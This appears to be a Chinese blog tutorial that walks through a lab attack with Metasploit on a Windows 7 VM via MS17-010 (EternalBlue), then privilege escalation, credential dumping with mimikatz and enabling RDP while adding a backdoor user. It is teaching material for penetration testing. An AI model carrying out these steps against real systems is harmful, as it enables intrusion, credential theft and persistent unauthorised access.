系统漏洞利用过程

it2025-02-18  3

系统漏洞利用过程

1.天镜、nessus、极光等扫描器进行漏洞扫描,跟据漏扫结果去msf里面进行查找漏洞利用工具(这里我以天镜,扫描本机作为一个例子)

(只当参考模板用)

2.开msf 通过search搜漏洞编号或漏洞名称

(这里我准备了一个kali和一个Win7虚拟机)

注意:(实验针对漏洞,关掉防火墙!)

①msfconsole:进入msf控制台

②search: 漏洞编号,例如ms17_010

(就是之前的永恒之蓝,也就是新闻上报道的比特币勒索病毒)

3.搜到漏洞之后,用use 打开msf漏洞利用工具

use (可以是序号,可以是完整漏洞工具)

4.输入info查看工具相关说明

(含有该漏洞的操作系统)

5.用show options 查看工具使用方法

(可以直观的从参数看出我们的配置项)

6、配置受害者

set payload…配置攻击链接

set rhosts …配置受害者主机

set lhosts …配置监听主机

set lport …配置监听端口

7.攻击run 或者exploit

8.溢出成功后,如果对方主机是普通用户权限,那么我们用msf里面的getsystem提升权限或者调用exploit/windows/local/bypassuac进行提权(提权有窃取令牌、假冒令牌、操作系统漏洞、getsystem)

(一开始我提前创建了一个test的普通用户并登录,但从结果可以看到已经是系统权限(可能是漏洞本身导致的这种现象),同时也进入了受害者主机的命令行模式(meterpreter表示木马模式))

9.当我们提权成功之后获取对方主机管理员用户帐号和密码(load mimikatz wdigest)

10.开启rdp&添加用户(run getgui -e #开启远程桌面 run getgui -u lltest2 -p 123456 #添加用户)

(可以看到远程桌面并没有成功,但是一开始我们就得到了该系统的用户账号密码,这步本质上是没有系统权限,提权以后才需要进行的)

万变不离其宗,漏洞验证就是这种流程,重在理解每个环节的意义~

最新回复(0)